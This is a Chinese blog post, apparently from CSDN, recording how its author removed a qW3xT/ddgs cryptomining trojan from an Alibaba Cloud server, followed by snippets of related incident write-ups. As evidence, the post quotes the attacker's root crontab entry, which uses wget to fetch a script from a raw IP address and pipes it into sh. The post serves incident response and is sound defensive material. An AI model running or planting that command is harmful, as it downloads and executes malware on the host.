记录一次阿里云服务器被挖矿木马攻击后的处理

最新推荐文章于 2025-01-07 10:28:59 发布

原创最新推荐文章于 2025-01-07 10:28:59 发布 · 2k 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#挖矿木马 #阿里云 #qW3xT

博主周末收到阿里云异常登录提醒，周一发现CPU占用率高达100%，遭遇攻击。详细记录了从修改密码、查找高占用进程、杀死挖矿病毒到清除定时任务和病毒文件的全过程。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

周末收到阿里云异常登录的短信提醒，没有理会，周一上线看了眼，cpu占用100%，发现被攻击了。

先修改管理员的登录密码

1.查看top进程
发现一个进程qW3xT.3进程占用99.9%的cpu
百度下明显是挖矿病毒程序
kill -9 端口号
杀死之后，会发现一会又启动了
观察top发现有一个守护进程ddgs.3014先启动，然后隐藏

2.查看ddgs进程并杀掉
ps -aux|grep ddgs
发现执行文件在/tmp目录下

先取消掉执行权限
chmod -x ddgs.3014
chmod -x qW3xT.3

一般这类病毒通过定时任务去下载，没找到根源的情况下，
删除了会重新下载的

留意目录/var/spool/cron 遇到不认识的连接直接干掉
我的目录下就发现了一个/var/spool/cron/crontabs/root文件

文件内容
*/15 * * * * wget -q -o- http://149.56.106.215:8000/i.sh |sh

很明显的下载病毒的连接，直接删除。

3.删除/tmp 目录下的病毒文件,问题解决

4.查看top，再未发现相应的进程

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

繁星若尘

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施

chinassj的博客

04-09

947

以前玩过腾讯，阿里，华为的免费服务器，都是又卡又慢，身为22世纪祖国的花朵，经过知识付费的熏陶，我义无反顾的终止了我的白嫖行为，然而努力让自己变得更好的路上总是有各种坑。。。。服务器背景：操作环境背景：操作系统：Windows 10 操作工具：xshell（Free for Home/school）故事背景：拿到服务器后，创建了一个普通用户：shaun ；密码：12345...

Linux【问题 05】阿里云+腾讯云服务器挖矿木马 kthreaddk 处理记录+云服务器使用建议

Java与大数据相关实践内容分享！

11-24

2716

阿里云+腾讯云服务器挖矿木马 kthreaddk 处理记录+云服务器使用建议

参与评论您还未登录，请先登录后发表或查看评论

阿里云ECS服务器被攻击，植入挖矿程序的处理历程(您的云服务器由于被检测到对外攻击，已阻断该服务器对其它服务器端口（TCP:22）的访问)、ssh远程端口的修改

m0_64422133的博客

10-01

1985

您的云服务器（xxx.xxx.x.xx）由于被检测到对外攻击，已阻断该服务器对其它服务器端口（TCP:22）的访问，阻断预计将在2024-10-02 05:39:24时间内结束，请及时进行安全自查。

阿里云centos环境之被木马攻击的一次记录<持续观察中>

陈袁的博客

01-05

3529

阿里云centos环境之被木马攻击的一次记录 1.背景 阿里云上ECS服务器上每天23点在tomcat/webapps都会自动下载下mydata.war,可以确定的是mydata.war是个木马,虽然删除但还是会定时下载 2.定时任务首先想到的是定时任务命令crontab,crontab命令的功能是在一定的时间间隔调度一些命令的执行查看文件/etc/crontab vi /et

记一次阿里云木马排查过程

Ellen_Tangxiang的博客

11-15

474

https://blog.youkuaiyun.com/dreamer2020/article/details/98652888

阿里云服务器被挖矿的解决方法

qq_47464056的博客

07-25

5248

云服务器被入侵植入挖矿程序！

阿里云CPU占用率90%被植入挖矿木马的解决方法

qq_35692642的博客

03-14

5164

目录问题总结问题最近几日突然发现服务器CPU占用率满了我一开始还没在意，但是当打开警告内容的时候心脏骤停查了一下，发现应该是被别人植入木马挖矿了，使用top命令看了一下CPU占用，发现有个python进程cpu占用率直接拉满，而且总是定时启动，没法直接使用kill杀死进程使用 vim /var/log/cron 查看了一下计划任务，果然不对劲但是使用crontab -l查看，什么也没有网上查了一下，发现可能是木马可能是从6379端口进来的，使用lsof -i:6379看了一下，几百

记录一次服务器因打开Docker允许远程登陆而不添加任何防护而被挖矿的经历

kitia01的博客

12-06

1234

可疑编码命令可疑发生时间：2024-12-06 23:04:56告警描述：检测模型发现您的服务器上执行的进程命令行高度可疑，很有可能与木马、病毒、黑客行为有关。异常事件详情数据来源：进程启动触发检测告警原因：该命令行存在高度可疑的编码特征。用户名：root命令行：chroot /mnt/ /bin/sh -c if!fi;进程路径：/bin/busybox进程ID：24609父进程文件路径：/usr/bin/runc父进程ID：24608进程链：fi;

python挖矿木马_kworkerds 挖矿木马简单分析及清理

weixin_39952800的博客

12-06

784

公司之前的开发和测试环境是在腾讯云上，部分服务器中过一次挖矿木马 kworkerds，本文为我当时分析和清理木马的记录，希望能对大家有所帮助。现象top 命令查看，显示 CPU 占用 100%，进程名无明显规则，如：TzBeq3AM。进程有时候会被隐藏，通过分析脚本删除部分依赖文件，可以显示出来。存在可疑的 python 进程。crontab 被写入了一个定时任务，每半小时左右会从 pastebi...

阿里云服务器被DDOS攻击

最新发布

Yuanyu20的博客

01-07

800

在DDoS攻击中，攻击者通常占用大量的计算资源，对目标服务器进行大流量的攻击，导致用户无法访问网站。4.更换高防服务器：所在的机房能提供较高的硬防设备，能防住常见的DDOS、UDP、SYN等流量攻击，可以为客户提供安全维护，能够拒绝服务攻击，定期扫描现有的网络节点，查找可能存在的安全漏洞。2. 慢速攻击：以缓慢的速度向服务器发送大量的TCP或HTTP请求，占用服务器的连接数资源，导致服务器无法响应合法用户的访问请求。3. 应用层攻击：通过发送大量的恶意请求，占用服务器的应用程序资源，导致正常用户无法访问。

阿里云服务器被攻击怎么解决？

abbe1809927446的博客

03-31

2094

总之，阿里云服务器被攻击的情况时有发生，但我们可以通过提高安全意识、优化服务器设置、加强网络安全等措施，增强服务器的安全性，有效防范并应对来自网络的攻击。然而，随着网络安全威胁的日益增多，阿里云服务器被攻击的情况也时有发生。5. 日志出现异常：如果服务器出现了大量的登录、错误、异常或攻击的日志，就需要考虑是否受到了攻击。1. 突然出现的异常流量：当你的服务器流量突然激增，但没有明显的原因，就需要考虑是否受到了攻击。4. 网络隔离：将被攻击的服务器与其他服务器隔离，可以防止攻击的传播和后续的攻击。

阿里云服务器被攻击了怎么办？

weixin_57024510的博客

10-28

1289

云服务器的使用越来越广泛，小伙伴们把自己的业务放到云上，既方便又便捷。那么云服务器也有一些容易出现的情况，就是服务器有可能会遭到攻击，一旦被攻击就会进入黑洞清洗。轻的停止半小时，重的停两个至24小时，同时也会给网站带来一定的损失。挂cdn隐藏IP，在换成新的ip后，请务必挂cdn对真实的ip进行隐藏，这样无论怎样被攻击，cdn都可以为你进行抵御。防止服务器ip泄漏并掩藏源ip ，那样黑客就无法找到源服务器ip ，也没法使用ddos有效地攻击你。在防火墙层面禁止所有的国外ip，可以很好的降低攻击流量。

阿里云服务器被挖矿怎么办

网站安全专家

02-11

5192

春节刚开始，我们SINE安全，发布了2018年服务器被挖矿的整体安全分析报告。该安全报告主要是以我们去年的整一年的安全数据为基础，对这些服务器的被挖矿的整体情况进行了详细的安全分析，为站长以及一些中小企业公司提出了合理的服务器安全防护建议。在去年的虚拟币市场中，虽然虚拟币经历了暴跌的情况，但是服务器被挖矿的情况还是持续性的增长趋势，背后是一些攻击者利用服务器的漏洞以及网站漏洞进行入侵服务器...

阿里云服务器遭到挖矿攻击的问题

ahoges的博客

04-24

1066

这两天发现老是被攻击，阿里云提示遭到挖矿程序攻击，我一个top，一看都飙到99%了（阿里云服务器牛逼），网上给的一些解决方案都不行，然后我发现我的docker上面凭空多了一个到两个ubuntu容器，容器和镜像的创建时间是被修改过的，一开始都没注意到，把容器停止，删掉镜像，挖矿程序果然就不见了。 ...

阿里云服务器被挖矿程序minerd入侵的终极解决办法

热门推荐

Java高知社区

01-06

4万+

突然发现阿里云服务器CPU很高，执行 top 一看，有个进程minerd尽然占用了200%多的CPU, 百度了一下，查到几篇文章都有人遇到同样问题，解决的办法：http://blog.youkuaiyun.com/hu_wen/article/details/51908597 但我去查看启动的服务，尽然没有 lady 这个服务。找不到根源，那个minerd进程删掉就又起来了，后来想了个临时办法，先停掉

记录一次阿里云服务器被挖矿程序攻击及处理

Crayon

11-26

1432

top命令发现该挖矿程序占用了200%CPU kill掉程序发现第二天仍然会生成该程序，crontab -l 发现存在该定时任务 crontab -e 命令编辑定时任务，删除该定时任务

阿里云ECS遭挖矿程序攻击解决方法（彻底清除挖矿程序，顺便下载了挖矿程序的脚本）

zzf1510711060的博客

10-11

1万+

一：杀死挖矿程序进程在服务器上使用top指令查看cpu的使用情况，发现有一个叫java的程序占用cpu高达99.9% PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 5778 root 20 0 ...

阿里云服务器被恶意程序攻击

qq_31755183的博客

10-29

3292

进日收到阿里云发来的报警信息，有台大数据服务器被恶意程序攻击，导致服务器的CUP、内存增高，之前处理过这种问题，处理的办法不是很理想，隔了一段时间又出现此类问题。在此总结一下：导致此类事件的原因包括：服务器的端口对外开放，黑客利用这些端口的漏洞来入侵服务器；服务器的账号密码过于简单，被黑客暴力破解入侵服务器；解决问题的办法如下：连接服务器找到恶意程序进程杀掉；删掉恶意进程文件；将对应执行恶意程序的用户也清除掉；清除系统计划任务中.

记一次服务器被挖矿程序攻击解决

时光钟摆

08-13

2704

这两天先后收到阿里云的两条短信，一次提示有挖矿程序；一次提示服务器上的crontab被改了。中间隔了1天。刚开始我还没有引起注意，看到有挖矿程序的时候，用top查看到有mined的进程，就直接kill掉了，后来又遇到的时候，发现不对啊，有两个特别占cpu的进程，分别是qW3xT.2和ddgs.3013。确定是挖矿进程无疑了。 1.使用top查看占用cpu高的进程，发现qW3xT.2占用将近...